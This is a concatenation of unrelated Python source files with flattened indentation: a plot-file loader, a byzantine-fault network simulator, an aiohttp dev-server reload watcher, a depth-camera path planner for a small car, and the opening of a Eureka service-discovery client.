and (time.time() - self.failed_to_open_filenames[file_path])
< self.refresh_parameter.retry_invalid_seconds
):
# Try once every `refresh_parameter.retry_invalid_seconds` seconds to open the file
return None
if file_path in self.plots:
return self.plots[file_path]
entry: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if entry is not None:
loaded_parent, duplicates = entry
if str(file_path.parent) in duplicates:
log.debug(f"Skip duplicated plot {str(file_path)}")
return None
try:
prover = DiskProver(str(file_path))
log.debug(f"process_file {str(file_path)}")
expected_size = _expected_plot_size(prover.get_size()) * UI_ACTUAL_SPACE_CONSTANT_FACTOR
stat_info = file_path.stat()
# TODO: consider checking if the file was just written to (which would mean that the file is still
# being copied). A segfault might happen in this edge case.
if prover.get_size() >= 30 and stat_info.st_size < 0.98 * expected_size:
log.warning(
f"Not farming plot {file_path}. Size is {stat_info.st_size / (1024**3)} GiB, but expected"
f" at least: {expected_size / (1024 ** 3)} GiB. We assume the file is being copied."
)
return None
cache_entry = self.cache.get(prover.get_id())
if cache_entry is None:
(
pool_public_key_or_puzzle_hash,
farmer_public_key,
local_master_sk,
) = parse_plot_info(prover.get_memo())
                    # Only use plots that have the correct keys associated with them
if farmer_public_key not in self.farmer_public_keys:
log.warning(f"Plot {file_path} has a farmer public key that is not in the farmer's pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
pool_public_key: Optional[G1Element] = None
pool_contract_puzzle_hash: Optional[bytes32] = None
if isinstance(pool_public_key_or_puzzle_hash, G1Element):
pool_public_key = pool_public_key_or_puzzle_hash
else:
assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
pool_contract_puzzle_hash = pool_public_key_or_puzzle_hash
if pool_public_key is not None and pool_public_key not in self.pool_public_keys:
log.warning(f"Plot {file_path} has a pool public key that is not in the farmer's pool pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
local_sk = master_sk_to_local_sk(local_master_sk)
plot_public_key: G1Element = ProofOfSpace.generate_plot_public_key(
local_sk.get_g1(), farmer_public_key, pool_contract_puzzle_hash is not None
)
cache_entry = CacheEntry(pool_public_key, pool_contract_puzzle_hash, plot_public_key)
self.cache.update(prover.get_id(), cache_entry)
with self.plot_filename_paths_lock:
paths: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if paths is None:
paths = (str(Path(prover.get_filename()).parent), set())
self.plot_filename_paths[file_path.name] = paths
else:
paths[1].add(str(Path(prover.get_filename()).parent))
log.warning(f"Have multiple copies of the plot {file_path.name} in {[paths[0], *paths[1]]}.")
return None
new_plot_info: PlotInfo = PlotInfo(
prover,
cache_entry.pool_public_key,
cache_entry.pool_contract_puzzle_hash,
cache_entry.plot_public_key,
stat_info.st_size,
stat_info.st_mtime,
)
with counter_lock:
result.loaded += 1
if file_path in self.failed_to_open_filenames:
del self.failed_to_open_filenames[file_path]
except Exception as e:
tb = traceback.format_exc()
log.error(f"Failed to open file {file_path}. {e} {tb}")
self.failed_to_open_filenames[file_path] = int(time.time())
return None
log.info(f"Found plot {file_path} of size {new_plot_info.prover.get_size()}")
if self.show_memo:
plot_memo: bytes32
if pool_contract_puzzle_hash is None:
plot_memo = stream_plot_info_pk(pool_public_key, farmer_public_key, local_master_sk)
else:
plot_memo = stream_plot_info_ph(pool_contract_puzzle_hash, farmer_public_key, local_master_sk)
plot_memo_str: str = plot_memo.hex()
log.info(f"Memo: {plot_memo_str}")
return new_plot_info
with self, ThreadPoolExecutor() as executor:
            # First drop all plots that we have in plot_filename_paths but that are no longer in the filesystem or no longer set in the config
def plot_removed(test_path: Path):
return not test_path.exists() or test_path.parent not in plot_directories
with self.plot_filename_paths_lock:
filenames_to_remove: List[str] = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
loaded_path, duplicated_paths = paths_entry
loaded_plot = Path(loaded_path) / Path(plot_filename)
if plot_removed(loaded_plot):
filenames_to_remove.append(plot_filename)
if loaded_plot in self.plots:
del self.plots[loaded_plot]
result.removed += 1
# No need to check the duplicates here since we drop the whole entry
continue
paths_to_remove: List[str] = []
for path in duplicated_paths:
if plot_removed(Path(path) / Path(plot_filename)):
paths_to_remove.append(path)
result.removed += 1
for path in paths_to_remove:
duplicated_paths.remove(path)
for filename in filenames_to_remove:
del self.plot_filename_paths[filename]
plots_refreshed: Dict[Path, PlotInfo] = {}
for new_plot in executor.map(process_file, plot_paths):
if new_plot is not None:
plots_refreshed[Path(new_plot.prover.get_filename())] = new_plot
self.plots.update(plots_refreshed)
result.duration = time.time() - start_time
self.log.debug(
f"refresh_batch: loaded {result.loaded}, "
f"removed {result.removed}, processed {result.processed}, "
f"remaining {result.remaining}, batch_size {self.refresh_parameter.batch_size}, "
f"duration: {result.duration:.2f} seconds"
)
return result
|
network.py
|
import time
import random
from node_stub import NodeStub
import asyncio
from threading import Thread, Lock
import queue
import sys
import logging
THREAD_COUNT = 10
STR_SEPARATOR = ','
class Task:
def __init__(self, node, function_name, args):
self.node = node
self.function_name = function_name
self.args = args
def __str__(self) -> str:
ret = self.node.get_pk() + STR_SEPARATOR + \
self.function_name + STR_SEPARATOR + str(self.args) + STR_SEPARATOR
for key in self.args:
ret += str(key) + ':' + str(self.args[key]) + STR_SEPARATOR
return ret
class NetworkMap:
def __init__(self, config, network_delay = 0, drop_ratio = 0, disable_primary = False, byzantine_node_cnt = 0) -> None:
self.config = config
self.lead_nodes = {}
self.client_nodes = {}
self.network_delay = network_delay
self.drop_ratio = drop_ratio
self.disable_primary = disable_primary
self._key_lock = Lock()
self._counter = dict()
self.tasks = queue.Queue()
self.stop = False
self.workers = []
self.byzantine_node_cnt = byzantine_node_cnt
self.current_byzantine_cnt = 0
for i in range(THREAD_COUNT):
worker = Thread(target=self.__send_events, daemon=True)
worker.start()
self.workers.append(worker)
def random_sleep(self):
if self.network_delay == 0:
return
time.sleep(random.randint(0, self.network_delay)/1000)
def set_network_delay(self, network_delay):
self.network_delay = network_delay
def register_lead(self, node, signature):
is_byzantine = random.randint(1, 3) == 2 and self.byzantine_node_cnt > self.current_byzantine_cnt
if is_byzantine:
self.current_byzantine_cnt += 1
signature.validate('aaa')
self.lead_nodes[signature.pk] = NodeStub(node, config=self.config, network_delay=self.network_delay, \
disable_primary = self.disable_primary, drop_ratio=self.drop_ratio, byzantine=is_byzantine)
def set_byzantine(self, key, new_value):
self.lead_nodes[key].set_byzantine(new_value)
def register_client(self, node, signature):
signature.validate('some data')
self.client_nodes[signature.pk] = node
def get_lead_nodes(self):
self.random_sleep()
return self.lead_nodes
def get_node(self, pk):
return self.client_nodes[pk] if pk in self.client_nodes else self.lead_nodes[pk]
def get_primary_for_view(self, new_view):
node_list = list(self.lead_nodes.values())
return node_list[new_view % len(node_list)]
# this helps when running synchronously
def get_shuffled_lead_nodes(self):
self.random_sleep()
shuffled_list = list(self.lead_nodes.values())
random.shuffle(shuffled_list)
return shuffled_list
def broadcast(self, function_name, args):
self._key_lock.acquire()
for node in self.get_shuffled_lead_nodes():
# exclude the sender.
signature = args['signature']
if signature.pk == node.get_pk():
continue
self.tasks.put(Task(node, function_name, args))
self._key_lock.release()
def send_to_node(self, node, function_name, args):
self._key_lock.acquire()
self.tasks.put(Task(node, function_name, args))
self._key_lock.release()
def send_to_primary_for_view(self, view, function_name, args):
node = self.get_primary_for_view(view)
self.send_to_node(node, function_name, args)
def __send_events(self):
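        # Each worker thread owns its own asyncio event loop and drains Task objects
        # from the shared queue, running one coroutine at a time until shutdown.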
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
while True:
if self.tasks.empty():
if self.is_shutdown():
sys.exit()
else:
time.sleep(2)
continue
task = self.tasks.get()
coroutine = getattr(task.node, task.function_name)(**task.args)
self.__incr(task.function_name)
loop.run_until_complete(coroutine)
self.tasks.task_done()
def is_shutdown(self):
out = None
self._key_lock.acquire()
out = self.stop
self._key_lock.release()
return out
def shutdown(self):
self._key_lock.acquire()
self.stop = True
self._key_lock.release()
def __incr(self, function_name):
self._key_lock.acquire()
self._counter[function_name] = self._counter.get(function_name, 0) + 1
self._key_lock.release()
def get_counter(self):
return self._counter
|
watch.py
|
import asyncio
import os
import signal
import sys
from multiprocessing import Process
from aiohttp import ClientSession
from watchgod import awatch
from ..exceptions import AiohttpDevException
from ..logs import rs_dft_logger as logger
from .config import Config
from .serve import WS, serve_main_app, src_reload
class WatchTask:
def __init__(self, path: str, loop: asyncio.AbstractEventLoop):
self._loop = loop
self._app = None
self._task = None
assert path
self.stopper = asyncio.Event(loop=self._loop)
self._awatch = awatch(path, stop_event=self.stopper)
async def start(self, app):
self._app = app
self._task = self._loop.create_task(self._run())
async def _run(self):
raise NotImplementedError()
async def close(self, *args):
if self._task:
self.stopper.set()
async with self._awatch.lock:
if self._task.done():
self._task.result()
self._task.cancel()
class AppTask(WatchTask):
template_files = '.html', '.jinja', '.jinja2'
def __init__(self, config: Config, loop: asyncio.AbstractEventLoop):
self._config = config
self._reloads = 0
self._session = ClientSession(loop=loop)
self._runner = None
super().__init__(self._config.code_directory, loop)
async def _run(self):
try:
self._start_dev_server()
async for changes in self._awatch:
self._reloads += 1
if any(f.endswith('.py') for _, f in changes):
logger.debug('%d changes, restarting server', len(changes))
self._stop_dev_server()
self._start_dev_server()
await self._src_reload_when_live()
elif len(changes) > 1 or any(f.endswith(self.template_files) for _, f in changes):
# reload all pages
await src_reload(self._app)
else:
# a single (non template) file has changed, reload a single file.
await src_reload(self._app, changes.pop()[1])
except Exception as exc:
logger.exception(exc)
await self._session.close()
raise AiohttpDevException('error running dev server')
async def _src_reload_when_live(self, checks=20):
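        # Poll the freshly restarted app (up to `checks` attempts, 0.1 s apart) and only
        # tell connected browsers to reload once it answers HTTP.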
if self._app[WS]:
url = 'http://localhost:{.main_port}/?_checking_alive=1'.format(self._config)
logger.debug('checking app at "%s" is running before prompting reload...', url)
for i in range(checks):
await asyncio.sleep(0.1, loop=self._app.loop)
try:
async with self._session.get(url):
pass
except OSError as e:
logger.debug('try %d | OSError %d app not running', i, e.errno)
else:
logger.debug('try %d | app running, reloading...', i)
await src_reload(self._app)
return
def _start_dev_server(self):
act = 'Start' if self._reloads == 0 else 'Restart'
logger.info('%sing dev server at http://%s:%s ●', act, self._config.host, self._config.main_port)
try:
tty_path = os.ttyname(sys.stdin.fileno())
except OSError: # pragma: no branch
# fileno() always fails with pytest
tty_path = '/dev/tty'
except AttributeError:
            # on Windows there is no tty; fall back to None as there is nothing better to do here
tty_path = None
self._process = Process(target=serve_main_app, args=(self._config, tty_path))
self._process.start()
def _stop_dev_server(self):
if self._process.is_alive():
logger.debug('stopping server process...')
os.kill(self._process.pid, signal.SIGINT)
self._process.join(5)
if self._process.exitcode is None:
logger.warning('process has not terminated, sending SIGKILL')
os.kill(self._process.pid, signal.SIGKILL)
self._process.join(1)
else:
logger.debug('process stopped')
else:
logger.warning('server process already dead, exit code: %s', self._process.exitcode)
async def close(self, *args):
self.stopper.set()
self._stop_dev_server()
await asyncio.gather(super().close(), self._session.close())
class LiveReloadTask(WatchTask):
async def _run(self):
async for changes in self._awatch:
if len(changes) > 1:
await src_reload(self._app)
else:
await src_reload(self._app, changes.pop()[1])
|
pathplanner.py
|
from numpy.linalg import svd, det
import multiprocessing as mp
from module.camera import *
import numpy as np
from threading import Thread
import module.config as conf
class PathFinder:
def __init__(self, car):
self.cam = None
self._car = car
self._camera_offset = self._car.size[2] - self._car.camera_offset[2]
self.verts = None
self.ground_plane = None # self._get_ground_plane()
# Path planning variables
self.theta = 0.0 # steering direction
self.phi = 0.0 # incline angle
self.dist = -1.0 # distance to object
self.t_last_data = 0.0 # last valid data reading
self.samplerate = 0.0
self.fov = conf.FOV # FieldOfView
self.q = mp.Queue() # message queue
self.pp = None
def start(self):
"""
Start path planner as own process
:return: Pathplanner process
"""
self.pp = mp.Process(target=self.run, name='path_planner', args=(self.q,))
try:
self.pp.start()
except Exception as err:
print("Error: unable to start path_planner thread, err: {}".format(err))
return self.pp
def end(self):
"""
end Pathplanner process
:return: process exitcode
"""
self.q.put("END")
if self.pp.is_alive():
self.pp.join(timeout=1)
self.q.close()
self.q.join_thread()
        if self.pp.is_alive():
self.pp.terminate()
print('\n\033[91m Path planner terminated\033[0m')
else:
print('\n\033[92m Path planner ended\033[0m')
return self.pp.exitcode
def _rigid_transform_3D(self, A, B):
assert len(A) == len(B)
N = A.shape[0] # total points
centroid_A = np.mean(A, axis=0)
centroid_B = np.mean(B, axis=0)
# centre the points
AA = A - np.tile(centroid_A, (N, 1))
BB = B - np.tile(centroid_B, (N, 1))
        # use matrix multiplication (the inputs are plain ndarrays, so `*` would be element-wise)
        H = np.transpose(AA) @ BB
        U, S, Vt = svd(H)
        R = Vt.T @ U.T
        # special reflection case
        if det(R) < 0:
            Vt[2, :] *= -1
            R = Vt.T @ U.T
        t = -R @ centroid_A.T + centroid_B.T
return R, t
def _get_ground_plane(self):
"""
        Estimate the ground plane using least squares
        :return: ground plane origin (point), rotation and normal
"""
pos, normal = self._planeFit()
rot, _ = self._rigid_transform_3D(pos, normal)
rot = np.eye(3) # todo calculate rotation matrix
return pos, rot, normal
def _planeFit(self):
"""
Original code from: https://stackoverflow.com/a/18968498
p, n = planeFit(points)
Given an array, points, of shape (d,...)
representing points in d-dimensional space,
fit an d-dimensional plane to the points.
:return: a point, p, on the plane (the point-cloud centroid),
and the normal, n.
"""
verts_t = np.transpose(self.verts)
        verts_t = np.reshape(verts_t, (np.shape(verts_t)[0], -1))  # Collapse trailing dimensions
assert verts_t.shape[0] <= verts_t.shape[1], "There are only {} points in {} dimensions.".format(verts_t.shape[1],
verts_t.shape[0])
ctr = verts_t.mean(axis=1)
x = verts_t - ctr[:, np.newaxis]
M = np.dot(x, x.T) # Could also use np.cov(x) here.
return ctr, svd(M)[0][:, -1]
def _process_verts(self, verts, tunnel_size, theta=0.0, phi=0.0):
"""
Process verts from Camera.
:param tunnel_size: the desired tunnel size, [w, h]
:param theta: The desired turning angle
:param phi: The desired incline angle.
:param ground_plane: The estimated driving plane.
:return: All inlier points in defined direction and for the defined tunnel size.
"""
# todo
# driving plane -> phi angle
p = verts
[w, h, l] = tunnel_size
z_lim = l # todo get lim from car size like:
# z_lim = self._camera_offset
X, Y, Z = p[:, 0], p[:, 1], p[:, 2]
# inlier index vector
# I = []
"""
Basic depth filter (Z)
do not allow points within car area.
"""
I = np.where((Z > z_lim))[0]
# if no inliers return None
if not I.any():
return None
"""
Filter height (Y) inliers # todo implement plane filter instead of static height
using the line equation y = kx + m we can formulate the inlier constraint as
-mlim <= m <= mlim for m = y - kx.
In this case we substitute y with the Y-array (Height) and x with the Z - array (Depth).
"""
radPhi = np.deg2rad(phi)
k_y = np.tan(-radPhi) # negate to get correct incline direction
mlim_h = [-h / 2, h / 2]
m = np.subtract(Y[I], np.multiply(k_y, Z[I])) # {m = y - kx} => m = Y - k.*Z
# Inlier indexes
I_y = np.where(np.logical_and(mlim_h[0] <= m, mlim_h[1] >= m))[0]
I = I[I_y]
"""
Filter width (X) inliers
using the same equation as above but now with the m being a function of k,X and Z.
we now only use inliers (I_y) form the above step to reduce necessary computations.
"""
radTheta = np.deg2rad(theta)
k_x = np.tan(radTheta)
mlim_w = [-w / 2, w / 2]
m = np.subtract(X[I], np.multiply(k_x, Z[I])) # {m = y - kx} => m = X - k.*Z
# Inlier of Y inliers
I_x = np.where(np.logical_and(mlim_w[0] <= m, mlim_w[1] >= m))[0]
# Pop outliers from I
I = I[I_x]
return p[I]
def _get_path(self, alpha=conf.PATH_SMOOTHING):
"""
Get distance and heading to longest path
:param alpha: smoothing factor
:return: None
"""
# todo:
# get theta span depending on furthest distance
# weight non-linear path depending on speed
        # implement max theta and speed change
theta = None
tunnel_size = self._car.size[0:3] # [w h l_offset]
#self.verts = self.cam.get_verts()
self.ground_plane = self._get_ground_plane()
max_dist = 0 # longest found path distance
n_scan_steps = 15
for _theta in range(int(self.theta - self.fov / 2), int(self.theta + self.fov / 2 + 1), n_scan_steps):
# process verts to get inlier points
inliers = self._process_verts(self.verts, tunnel_size=tunnel_size, theta=_theta, phi=self.phi)
try:
Z = inliers[:, 2]
_dist = np.min(Z)
if _dist >= max_dist * 1.25: # Must be more than 25% longer to change heading
theta = _theta
max_dist = _dist
            except (TypeError, ValueError):  # inliers is None or empty
pass
if theta is not None:
# Smoothing
self.theta = alpha * theta + (1 - alpha) * self.theta
self.dist = min(alpha * max_dist + (1 - alpha) * self.dist, max_dist)
def _image_extraction(self):
"""
Image extraction thread
:return: None
"""
# todo move to thread in Camera class
try:
while True:
shared.raw_image = shared.nparray_to_rawarray(self.cam.get_image())
shared.t_raw_image.value = time.perf_counter()
except Exception as err:
print('Error in image extraction thread: ', err)
def run(self, q):
"""
Main Path planner Process
:param q: message queue
:return: none
"""
rx_msg = tx_msg = []
# Init RealSense camera with threading
self.cam = init_camera()
# If Raw image is requested, start tread for image extraction
if conf.IMAGERAW:
ie = Thread(target=self._image_extraction)
#ie.daemon = True
ie.start()
while True:
# get RX data from queue
# todo
# get verts from camera
self.verts = self.cam.get_verts()
# Get sample rate
_t_now = time.perf_counter()
self.samplerate = 1 / (_t_now - self.t_last_data)
self.t_last_data = _t_now
# Get new path
self._get_path()
# Create TX message
tx_msg = {'dist': self.dist,
'rate': self.samplerate,
'theta': self.theta,
'ground': self.ground_plane,
'last_reading': self.t_last_data}
            # Check for an END command in the RX data, otherwise send new TX data
if "END" in rx_msg:
break # End process
elif tx_msg:
q.put(tx_msg) # send data as Queue message
# End process
while not q.empty(): # flush queue
q.get()
time.sleep(0.01)
q.close()
self.cam.end()
print('\n\033[92m Path planner ended\033[0m')
|
eureka_client.py
|
# -*- coding: utf-8 -*-
"""
Copyright (c) 2018 Keijack Wu
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import atexit
import inspect
import json
import random
import re
import socket
import ssl
import time
from threading import RLock, Thread, Timer
from typing import Callable, Dict, List, Union
import py_eureka_client.http_client as http_client
import py_eureka_client.netint_utils as netint
from py_eureka_client import (
application,
constants,
eureka_server_conf,
exceptions,
registry,
util,
)
from py_eureka_client.__aws_info_loader import AmazonInfo
from py_eureka_client.logger import get_logger
_logger = get_logger("eureka_client")
class EurekaClient:
"""
Example:
>>> client = EurekaClient(
eureka_server="http://my_eureka_server_peer_1/eureka/v2,http://my_eureka_server_peer_2/eureka/v2",
app_name="python_module_1",
instance_port=9090)
>>> client.start()
>>> result = client.do_service("APP_NAME", "/context/path", return_type="json")
EIPs support:
    You can configure EIP using `eureka_availability_zones` and specify the `zone` of your instance. But please be aware that the client won't fill in the metadata automatically;
    you should put it into the `metadata` yourself when creating the object.
>>> client = EurekaClient(eureka_availability_zones={
"us-east-1c": "http://ec2-552-627-568-165.compute-1.amazonaws.com:7001/eureka/v2/,http://ec2-368-101-182-134.compute-1.amazonaws.com:7001/eureka/v2/",
"us-east-1d": "http://ec2-552-627-568-170.compute-1.amazonaws.com:7001/eureka/v2/",
"us-east-1e": "http://ec2-500-179-285-592.compute-1.amazonaws.com:7001/eureka/v2/"},
zone="us-east-1c",
app_name="python_module_1",
instance_port=9090,
data_center_name="Amazon")
EurekaClient supports DNS discovery feature.
    For instance, the following is a DNS TXT record created in the DNS server that lists the set of available DNS names for a zone.
>>> txt.us-east-1.mydomaintest.netflix.net="us-east-1c.mydomaintest.netflix.net" "us-east-1d.mydomaintest.netflix.net" "us-east-1e.mydomaintest.netflix.net"
Then, you can define TXT records recursively for each zone similar to the following (if more than one hostname per zone, space delimit)
>>> txt.us-east-1c.mydomaintest.netflix.net="ec2-552-627-568-165.compute-1.amazonaws.com" "ec2-368-101-182-134.compute-1.amazonaws.com"
>>> txt.us-east-1d.mydomaintest.netflix.net="ec2-552-627-568-170.compute-1.amazonaws.com"
>>> txt.us-east-1e.mydomaintest.netflix.net="ec2-500-179-285-592.compute-1.amazonaws.com"
And then you can create the client like:
>>> client = EurekaClient(eureka_domain="mydomaintest.netflix.net",
region="us-east-1",
zone="us-east-1c",
app_name="python_module_1",
instance_port=9090,
data_center_name="Amazon")
Eureka client also supports setting up the protocol, basic authentication and context path of your eureka server.
>>> client = EurekaClient(eureka_domain="mydomaintest.netflix.net",
region="us-east-1",
zone="us-east-1c",
eureka_protocol="https",
eureka_basic_auth_user="keijack",
eureka_basic_auth_password="kjauthpass",
eureka_context="/eureka/v2",
app_name="python_module_1",
instance_port=9090,
data_center_name="Amazon")
or
>>> client = EurekaClient(eureka_server="my_eureka_server_peer_1,my_eureka_server_peer_2",
eureka_protocol="https",
eureka_basic_auth_user="keijack",
eureka_basic_auth_password="kjauthpass",
eureka_context="/eureka/v2",
app_name="python_module_1",
instance_port=9090)
    You can use `do_service`, `do_service_async`, `walk_nodes`, `walk_nodes_async` to call the remote services.
>>> res = eureka_client.do_service("OTHER-SERVICE-NAME", "/service/context/path")
>>> def success_callabck(data):
...
def error_callback(error):
...
client.do_service_async("OTHER-SERVICE-NAME", "/service/context/path", on_success=success_callabck, on_error=error_callback)
>>> def walk_using_your_own_urllib(url):
...
res = client.walk_nodes("OTHER-SERVICE-NAME", "/service/context/path", walker=walk_using_your_own_urllib)
>>> client.walk_nodes("OTHER-SERVICE-NAME", "/service/context/path",
walker=walk_using_your_own_urllib,
on_success=success_callabck,
on_error=error_callback)
"""
def __init__(
self,
# The eureka server url; if you have deployed a cluster for failover, use `,` to separate the urls.
eureka_server: str = constants.Constant.DEFAULT_EUREKA_SERVER_URL,
# The domain name when using the DNS discovery.
eureka_domain: str = "",
# The region when using DNS discovery.
region: str = "",
# Which zone your instances belong to, default is `default`.
zone: str = "",
# The zones' url configurations.
eureka_availability_zones: Dict[str, str] = {},
# The protocol of the eureka server; if the url already includes this part, it will not be added to the url.
eureka_protocol: str = "http",
# User name for basic authentication of the eureka server; if the url already includes this part, it will not be added to the url.
eureka_basic_auth_user: str = "",
# Password for basic authentication of the eureka server; if the url already includes this part, it will not be added to the url.
eureka_basic_auth_password: str = "",
# The context path of the eureka server; if the url already includes this part, it will not be added to the url. Default is `/eureka`,
# which matches the spring-boot eureka context but not the Netflix eureka server url.
eureka_context: str = "/eureka",
# When set to True, the client will first try eureka servers in the same zone to register, and prefer instances in the same zone when
# calling services. Otherwise it will choose eureka servers and instances randomly. Default is `True`.
prefer_same_zone: bool = True,
# When set to False, will not register this instance to the eureka server, default is `True`.
should_register: bool = True,
# When set to False, will not pull registry from the eureka server, default is `True`.
should_discover: bool = True,
# A callback invoked when a register/heartbeat/discovery error occurs; it is called as on_error(error_type, exception).
on_error: Callable = None,
## The following parameters are the properties of this instance; all these fields will be sent to the eureka server.
# The application name of this instance.
app_name: str = "",
# The id of this instance; if not specified, one will be generated from app_name, instance_host/instance_ip and instance_port.
instance_id: str = "",
# The host of this instance.
instance_host: str = "",
# The ip of this instance. If instance_host and instance_ip are not specified, the client will try to find the ip via a connection to the eureka server.
instance_ip: str = "",
# The ip network of this instance. If instance_host and instance_ip are not specified, the client will try to find the ip from the available network adapters that match the specified network, for example 192.168.1.0/24.
instance_ip_network: str = "",
# The port of this instance.
instance_port: int = constants.Constant.DEFAULT_INSTANCE_PORT,
# Whether to enable the instance's unsecure port, default is `True`.
instance_unsecure_port_enabled: bool = True,
# The secure port of this instance.
instance_secure_port: int = constants.Constant.DEFAULT_INSTANCE_SECURE_PORT,
# Whether to enable the instance's secure port, default is `False`.
instance_secure_port_enabled: bool = False,
# Accepts `Netflix`, `Amazon`, `MyOwn`; default is `MyOwn`.
data_center_name: str = constants.Constant.DEFAULT_DATA_CENTER_INFO,
# Heartbeats are sent and the registry is pulled at this interval; default is 30 seconds.
renewal_interval_in_secs: int = constants.Constant.RENEWAL_INTERVAL_IN_SECS,
# Sets the client-specified setting for eviction (i.e. how long the server should wait without a renewal event before evicting this instance).
duration_in_secs: int = constants.Constant.DURATION_IN_SECS,
# The home page url of this instance.
home_page_url: str = "",
# The status page url of this instance.
status_page_url: str = "",
# The health check url of this instance.
health_check_url: str = "",
# The secure health check url of this instance.
secure_health_check_url: str = "",
# The virtual ip address of this instance.
vip_adr: str = "",
# The secure virtual ip address of this instance.
secure_vip_addr: str = "",
# Sets a flag indicating whether this instance is the same as the discovery server that is
# returning the instances. This flag is used by the discovery clients to
# identify the discovery server which is coordinating/returning the
# information.
is_coordinating_discovery_server: bool = False,
# The metadata map of this instance.
metadata: Dict = {},
# Also discover services that belong to these regions.
remote_regions: List[str] = [],
# Specify the strategy for choosing an instance when there is more than one instance of an app.
ha_strategy: int = constants.HAStrategy.HA_STRATEGY_RANDOM,
):
assert (
app_name is not None and app_name != "" if should_register else True
), "application name must be specified."
assert instance_port > 0 if should_register else True, "port is invalid"
assert isinstance(metadata, dict), "metadata must be dict"
assert (
ha_strategy
in (
constants.HAStrategy.HA_STRATEGY_RANDOM,
constants.HAStrategy.HA_STRATEGY_STICK,
constants.HAStrategy.HA_STRATEGY_OTHER,
)
if should_discover
else True
), f"do not support strategy {ha_strategy}"
self.__net_lock = RLock()
self.__eureka_server_conf = eureka_server_conf.EurekaServerConf(
eureka_server=eureka_server,
eureka_domain=eureka_domain,
eureka_protocol=eureka_protocol,
eureka_basic_auth_user=eureka_basic_auth_user,
eureka_basic_auth_password=eureka_basic_auth_password,
eureka_context=eureka_context,
eureka_availability_zones=eureka_availability_zones,
region=region,
zone=zone,
)
self.__cache_eureka_url = {}
self.__should_register = should_register
self.__should_discover = should_discover
self.__prefer_same_zone = prefer_same_zone
self.__alive = False
self.__heartbeat_interval = renewal_interval_in_secs
self.__heartbeat_timer = Timer(renewal_interval_in_secs, self.__heartbeat)
self.__heartbeat_timer.daemon = True
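# Note: __heartbeat runs an endless loop itself, so this Timer only delays the
# first heartbeat by renewal_interval_in_secs; after that the loop sleeps
# between iterations on its own.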
self.__instance_ip = instance_ip
self.__instance_ip_network = instance_ip_network
self.__instance_host = instance_host
self.__aws_metadata = {}
self.__on_error_callback = on_error
# For registry
if should_register:
if data_center_name == "Amazon":
self.__aws_metadata = self.__load_ec2_metadata_dict()
if self.__instance_host == "" and self.__instance_ip == "":
self.__instance_ip, self.__instance_host = self.__get_ip_host(
self.__instance_ip_network
)
elif self.__instance_host != "" and self.__instance_ip == "":
self.__instance_ip = netint.get_ip_by_host(self.__instance_host)
if not EurekaClient.__is_ip(self.__instance_ip):
def try_to_get_client_ip(url):
self.__instance_ip = EurekaClient.__get_instance_ip(url)
self.__connect_to_eureka_server(try_to_get_client_ip)
elif self.__instance_host == "" and self.__instance_ip != "":
self.__instance_host = netint.get_host_by_ip(self.__instance_ip)
mdata = {"management.port": str(instance_port)}
if zone:
mdata["zone"] = zone
mdata.update(metadata)
ins_id = (
instance_id
if instance_id != ""
else f"{self.__instance_ip}:{app_name.lower()}:{instance_port}"
)
_logger.debug(f"register instance using id [#{ins_id}]")
self.__instance = {
"instanceId": ins_id,
"hostName": self.__instance_host,
"app": app_name.upper(),
"ipAddr": self.__instance_ip,
"port": {
"$": instance_port,
"@enabled": str(instance_unsecure_port_enabled).lower(),
},
"securePort": {
"$": instance_secure_port,
"@enabled": str(instance_secure_port_enabled).lower(),
},
"countryId": 1,
"dataCenterInfo": {
"@class": constants.Constant.AMAZON_DATA_CENTER_INFO_CLASS
if data_center_name == "Amazon"
else constants.Constant.DEFAULT_DATA_CENTER_INFO_CLASS,
"name": data_center_name,
},
"leaseInfo": {
"renewalIntervalInSecs": renewal_interval_in_secs,
"durationInSecs": duration_in_secs,
"registrationTimestamp": 0,
"lastRenewalTimestamp": 0,
"evictionTimestamp": 0,
"serviceUpTimestamp": 0,
},
"metadata": mdata,
"homePageUrl": EurekaClient.__format_url(
home_page_url, self.__instance_host, instance_port
),
"statusPageUrl": EurekaClient.__format_url(
status_page_url, self.__instance_host, instance_port, "info"
),
"healthCheckUrl": EurekaClient.__format_url(
health_check_url, self.__instance_host, instance_port, "health"
),
"secureHealthCheckUrl": secure_health_check_url,
"vipAddress": vip_adr if vip_adr != "" else app_name.lower(),
"secureVipAddress": secure_vip_addr
if secure_vip_addr != ""
else app_name.lower(),
"isCoordinatingDiscoveryServer": str(
is_coordinating_discovery_server
).lower(),
}
if data_center_name == "Amazon":
self.__instance["dataCenterInfo"]["metadata"] = self.__aws_metadata
else:
self.__instance = {}
# For discovery
self.__remote_regions = remote_regions if remote_regions is not None else []
self.__applications: application.Applications
self.__delta: application.Applications
self.__ha_strategy = ha_strategy
self.__ha_cache = {}
self.__application_mth_lock = RLock()
def __get_ip_host(self, network):
ip, host = netint.get_ip_and_host(network)
if (
self.__aws_metadata
and "local-ipv4" in self.__aws_metadata
and self.__aws_metadata["local-ipv4"]
):
ip = self.__aws_metadata["local-ipv4"]
if (
self.__aws_metadata
and "local-hostname" in self.__aws_metadata
and self.__aws_metadata["local-hostname"]
):
host = self.__aws_metadata["local-hostname"]
return ip, host
def __load_ec2_metadata_dict(self):
